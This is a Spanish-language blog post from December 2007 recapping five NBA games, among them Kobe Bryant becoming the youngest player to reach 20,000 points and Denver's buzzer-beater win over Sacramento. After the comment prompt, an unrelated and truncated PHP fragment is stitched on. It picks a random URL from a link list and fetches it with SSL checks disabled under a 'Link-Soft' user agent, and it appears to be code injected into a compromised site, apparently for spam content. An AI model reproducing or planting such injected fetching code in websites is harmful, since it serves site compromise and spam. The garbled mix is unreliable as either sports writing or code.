La crónica (23/12/07)

24 de December de 2007 por telekoman

La jornada prenavideña nos ha servido en bandeja 5 partidos en los que hemos visto como Kobe vuelve a escribir su nombre en los libros de historia al ser el jugador más joven en alcanzar los 20.000 puntos. También hemos visto como los Pistons continúan afinando la maquinaria y alcanzan ya las 20 victorias esta temporada. Ese número ya lo alcanzaron los Celtics hace algunas jornadas y lo siguen incrementando. Esta vez frente a un rival directo por el título del Este como Orlando que se vio aplastado por el Big Three más Rondo. Y se oyeron pitos y abucheos en Cleveland al perder los Cavaliers contra los Warriors con un juego bastante pobre. En el partido más emocionante, Denver ganó a Sacramento en el último instante con un tiro sobre la bocina de Kleiza que le sirve para mantener el primer puesto de la División NorthWest.

 



Lakers 95 – Knicks 90

Noche histórica en el Madison Square Garden. Kobe Bryant, gracias a los 39 puntos anotados frente a los Knicks, consigue ser el jugador más joven en la historia en alcanzar la cifra de 20.000 puntos en su carrera. Sólo otros dos jugadores han conseguido llegar a esa cifra por debajo de los 30 años. Wilt Chamberlain y Michael Jordan. Eso da una idea muy clara de la magnitud del hecho. Aparte de los 39 puntos, Kobe fue también el máximo reboteador de su equipo con 11 y el máximo asistente con 8. El partido fue un duelo constante entre Kobe y Jamaal Crawford, que con 31 puntos fue, con mucho el mejor jugador de su equipo. Por lo Lakers tan sólo Bynum acompañó algo a Bryant al conseguir 13 puntos y 8 rebotes. El resto del equipo no llegó a 10. Por los Knicks la situación no es mucho mejor, ya que a la baja real de Marbury (se ha perdido 8 de las 10 últimos encuentros), se le sumó la baja de Curry, que si bien disputó el partido, estuvo prácticamente desaparecido. El juego interior de los Knicks es un desastre y sólo cuando sale David Lee tiene algo más de fluidez. La suplencia de Lee es uno más de los puntos negros de un equipo nefasto.

Rockets 82 – Pistons 94

Partido sin historia en el Auburn Hill. Los Rockets llegaron a Detroit casi sin tiempo tras una agotadora serie de 4 partidos en 5 días. Cuando además tienes enfrente a uno de los 2 mejores equipos de la actualidad, el resultado es bastante evidente. Sin necesidad de hacer un partido excelso, los Pistons han conseguido pasar por encima de los Rockets. El rendimiento del equipo del Este, sobre todo en el aspecto defensivo está a estas alturas a un gran nivel. Y también en el aspecto ofensivo, donde 5 jugadores han conseguido más de 13 puntos. Por parte de los Rockets, que tuvieron la mala suerte de que durante el partido se les lesionaran tanto Yao como McGrady, Scola fué el mejor con 18 puntos y 9 rebotes. El equipo de Detroit es, junto a Boston, el único equipo que llega a 20 victorias, ganando 12 de los últimos 14 partidos.

Warriors 105 – Cavaliers 96

Está claro que esta temporada no tiene nada que ver con la pasada para los Cleveland Cavaliers. Tras la derrota en casa frente a los Warriors, la décima en 13 partidos, se escucharon abucheos por parte de los aficionados y LeBron salió muy enfadado, sin atender a los medios de comunicación. El partido fué dominado de cabo a rabo por los jugadores de los Warriors, en especial por Baron Davis, 27 puntos y 10 asistencias, y Stephen Jackson con 29 puntos. En el primer cuarto los Warriors consiguieron abrir una brecha de 16 puntos en el marcador, que aumentaron en el tercer cuarto, y que les sirvió para tener un partido bastante cómodo. Junto a Davis y Jackson, Monta Ellis aportó 19 puntos y Harrington 16, mientras que Biedrins continuó con su buena temporada al capturar 12 rebotes. Por parte de Cleveland sólo 2 hombres se acercaron a lo que se espera de ellos. LeBron, con una serie malísima en el tiro, 8 de 20 consiguió 25 puntos y 8 asistencias, mientras que Ilgauskas llegó a los 20 puntos, pero sólo capturó 5 rebotes.

Magic 91 – Boston 103

Poco se puede hacer cuando 4 jugadores del equipo contrario superan los 20 puntos. Al “Big Three” de Boston se le ha unido un asistente “inesperado”. La temporada de Rondo está siendo magnífica en cuanto a dirección de juego, pero a eso además le está sumando buenas actuaciones anotadoras como la de ayer, donde consiguió 23 puntos. Pero el partido, en contra de lo que pueda parecer, se ganó desde la defensa. Y eso es lo que din duda más preocupa a los demás equipos. Los Celtics consiguieron dejar a Dwight Howard en 23 puntos y 14 rebotes y a Turkoglu y Lewis en 19 y 15 puntos respectivamente. El resto del equipo no pudo pasar de 9 puntos. Los Magic han perdido 7 de los últimos 9 partidos y se quedan con una marca de 18 – 11, mientras que los Celtics encabezan la clasificación con 22 – 3.

Nuggets 106 – Kings 105

El héroe del partido fue Linas Kleiza, un secundario que con su tiro sobre la bocina permitió que los Nuggets ganaran un partido que tenían perdido al descanso. Los Kings dominaron durante la primera mitad del partido llegando a alcanzar una renta de 15 puntos al descanso. Sin embargo, y gracias en parte a sus fallos, permitieron que los de Denver se acercaran en el marcador durante la segunda mitad y llegaran a los últimos minutos con opciones. A falta de 3:39, Denver perdía de 7 puntos, y a falta de tan sólo 53 segundos, un tiro de Udrih ponía el 105 – 102 en el marcador. 4 tiros libres desperdiciados, una canasta de Melo y el tiro final de Kleiza hicieron el resto. Por parte de Denver el mejor fue el propio Melo que alcanzó la treintena de puntos y capturó 12 rebotes, y estuvo bien secundado por Iverson con 21 puntos en una mala serie de tiro y Camby con 19 y 14 rebotes. Por los Kings Artest rozó el triple doble con 24 puntos, 9 rebotes y 8 asistencias, mientras que Brad Miller consiguió 22 y 8 rebotes, pero falló 2 de los últimos 4 tiros libres de su equipo en el minuto final.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>